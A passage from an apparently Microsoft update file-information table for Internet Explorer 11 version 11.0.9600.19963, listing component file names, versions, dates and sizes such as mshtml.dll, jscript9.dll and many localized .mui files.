13-Feb-2021| 13:02| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 6,656 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 6,656 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 6,656 \nwininet.dll| 11.0.9600.19963| 12-Feb-2021| 18:15| 4,859,904 \njsproxy.dll| 11.0.9600.19963| 12-Feb-2021| 19:08| 54,784 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 114,176 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 130,560 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 124,928 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 122,880 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 130,048 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 138,240 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:47| 114,688 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 131,584 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 117,760 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 122,368 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 134,144 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 107,008 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 123,392 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 127,488 
\ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 128,512 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 88,576 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 82,944 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 125,440 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 123,392 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 120,320 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 130,560 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 125,952 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 128,000 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 124,416 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 121,856 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 115,712 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 125,440 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 72,704 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 73,728 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 73,728 \niedkcs32.dll| 18.0.9600.19963| 13-Feb-2021| 12:45| 390,560 \ninstall.ins| Not versioned| 12-Feb-2021| 16:26| 464 \nieapfltr.dat| 10.0.9301.0| 25-Jun-2019| 6:11| 616,104 \nieapfltr.dll| 11.0.9600.19963| 12-Feb-2021| 17:53| 800,768 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:47| 88,064 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.19963| 12-Feb-2021| 19:19| 666,624 \niedvtool.dll| 11.0.9600.19963| 12-Feb-2021| 21:02| 950,784 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:21| 50,176 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:53| 491,008 \ndxtrans.dll| 11.0.9600.19963| 
12-Feb-2021| 18:40| 316,416 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 12-Feb-2021| 16:23| 11,892 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 4,096 \nF12.dll.mui| 
11.0.9600.19963| 13-Feb-2021| 13:11| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:51| 245,248 \nF12Resources.dll| 11.0.9600.19963| 12-Feb-2021| 19:24| 10,949,120 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 2,048 
\nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 2,048 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:50| 372,224 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 1,422,848 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 809,472 \nmsfeeds.mof| Not versioned| 12-Feb-2021| 16:34| 1,518 \nmsfeedsbs.mof| Not versioned| 12-Feb-2021| 16:34| 1,574 \nmsfeedsbs.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 60,416 \nmsfeedssync.exe| 11.0.9600.19963| 12-Feb-2021| 19:17| 13,312 \nhtml.iec| 2019.0.0.19963| 12-Feb-2021| 19:15| 417,280 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:42| 92,672 \nmshtmlmedia.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 1,360,384 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 21:02| 25,762,816 \nmshtml.tlb| 11.0.9600.19963| 12-Feb-2021| 19:29| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 12-Feb-2021| 16:23| 3,228 \nieetwcollector.exe| 11.0.9600.19963| 12-Feb-2021| 19:04| 116,224 \nieetwproxystub.dll| 11.0.9600.19963| 12-Feb-2021| 19:15| 48,640 \nieetwcollectorres.dll| 11.0.9600.19963| 12-Feb-2021| 19:29| 4,096 \nielowutil.exe| 11.0.9600.19963| 12-Feb-2021| 19:06| 222,720 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:48| 870,400 \nIEShims.dll| 11.0.9600.19963| 12-Feb-2021| 17:57| 387,072 \nWindows Pop-up Blocked.wav| Not versioned| 25-Jun-2019| 6:16| 85,548 \nWindows Information Bar.wav| Not versioned| 25-Jun-2019| 6:16| 23,308 \nWindows Feed Discovered.wav| Not 
versioned| 25-Jun-2019| 6:16| 19,884 \nWindows Navigation Start.wav| Not versioned| 25-Jun-2019| 6:16| 11,340 \nbing.ico| Not versioned| 25-Jun-2019| 6:14| 5,430 \nieUnatt.exe| 11.0.9600.19963| 12-Feb-2021| 19:04| 144,384 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Feb-2021| 13:47| 2,956 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 628,736 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 1,862,656 \nMshtmlDac.dll| 11.0.9600.19963| 12-Feb-2021| 19:14| 88,064 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 18:38| 1,217,024 \noccache.dll| 11.0.9600.19963| 12-Feb-2021| 18:39| 152,064 \ndesktop.ini| Not versioned| 25-Jun-2019| 6:12| 65 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:30| 262,144 \ndesktop.ini| Not versioned| 25-Jun-2019| 6:12| 65 \nmsrating.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 199,680 \nicrav03.rat| Not versioned| 25-Jun-2019| 6:12| 8,798 \nticrf.rat| Not versioned| 25-Jun-2019| 6:12| 1,988 \niertutil.dll| 11.0.9600.19963| 12-Feb-2021| 19:17| 2,915,840 \nsqmapi.dll| 6.2.9200.16384| 13-Feb-2021| 12:44| 286,088 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:28| 728,064 \niernonce.dll| 11.0.9600.19963| 12-Feb-2021| 19:07| 34,304 \niesetup.dll| 11.0.9600.19963| 12-Feb-2021| 19:16| 66,560 \nieuinit.inf| Not versioned| 12-Feb-2021| 17:31| 16,303 \ninseng.dll| 11.0.9600.19963| 12-Feb-2021| 18:46| 107,520 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:45| 219,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:07| 172,032 \nTimeline.cpu.xml| Not versioned| 25-Jun-2019| 6:12| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 1,018,880 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 2,066,432 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 2,121,216 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 2,075,136 \nieui.dll.mui| 11.0.9600.19963| 
13-Feb-2021| 12:48| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 2,063,872 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 2,314,240 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 2,390,528 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 2,033,152 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 2,307,584 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 2,255,872 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 2,061,312 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 2,326,016 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 2,019,840 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 2,071,040 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 2,082,816 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 2,307,584 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 2,170,368 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 2,153,984 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 2,291,712 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 2,283,520 \nieui.dll.mui| 11.0.9600.19963| 
13-Feb-2021| 13:00| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 2,052,096 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 2,301,952 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 2,093,056 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 2,075,648 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 2,299,392 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 2,094,592 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 2,316,800 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 2,305,536 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 2,278,912 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 2,277,888 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 2,060,288 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 2,315,776 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 2,278,912 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 2,324,992 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 2,098,176 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 1,890,304 \nieui.dll.mui| 11.0.9600.19963| 
13-Feb-2021| 13:13| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 1,890,304 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 3,072 \nieframe.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 15,506,944 \nieui.dll| 11.0.9600.19963| 12-Feb-2021| 19:05| 615,936 \nieframe.ptxml| Not versioned| 12-Feb-2021| 16:23| 24,486 \nieinstal.exe| 11.0.9600.19963| 12-Feb-2021| 18:40| 492,032 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:46| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:47| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:48| 526,294 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:49| 499,654 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:50| 552,337 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:50| 944,559 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:48| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:51| 543,946 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:52| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:53| 526,557 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:54| 575,838 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:54| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:55| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:56| 570,737 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:57| 548,119 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:58| 639,271 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:59| 525,504 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:59| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:00| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:01| 488,488 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:02| 548,494 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:03| 559,343 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:03| 535,067 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:04| 541,455 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:05| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:06| 804,470 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:07| 457,561 \nInetRes.adml| 
Not versioned| 13-Feb-2021| 13:07| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:08| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:09| 503,909 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:10| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:10| 521,583 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:11| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:13| 420,082 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:13| 436,651 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:14| 436,651 \ninetres.admx| Not versioned| 8-Feb-2021| 20:02| 1,678,023 \nMsSpellCheckingFacility.exe| 6.3.9600.19963| 12-Feb-2021| 18:56| 970,752 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 29,184 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 35,328 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 37,888 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 27,648 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 33,792 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 23,040 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 22,016 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 31,232 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 34,304 
\njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 35,840 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 34,816 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 32,256 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 30,720 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 16,384 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 16,896 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 16,896 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 19:04| 5,499,904 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 19:03| 814,592 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 19:04| 785,408 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 19:15| 581,120 \niexplore.exe| 11.0.9600.19963| 13-Feb-2021| 11:46| 810,376 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 696,320 \nmsfeeds.mof| Not versioned| 12-Feb-2021| 16:34| 1,518 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtmlmedia.dll| 11.0.9600.19963| 12-Feb-2021| 18:11| 1,155,584 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 18:58| 20,296,192 \nmshtml.tlb| 11.0.9600.19963| 12-Feb-2021| 18:59| 2,724,864 \nwow64_Microsoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 12-Feb-2021| 16:26| 3,228 \nieetwproxystub.dll| 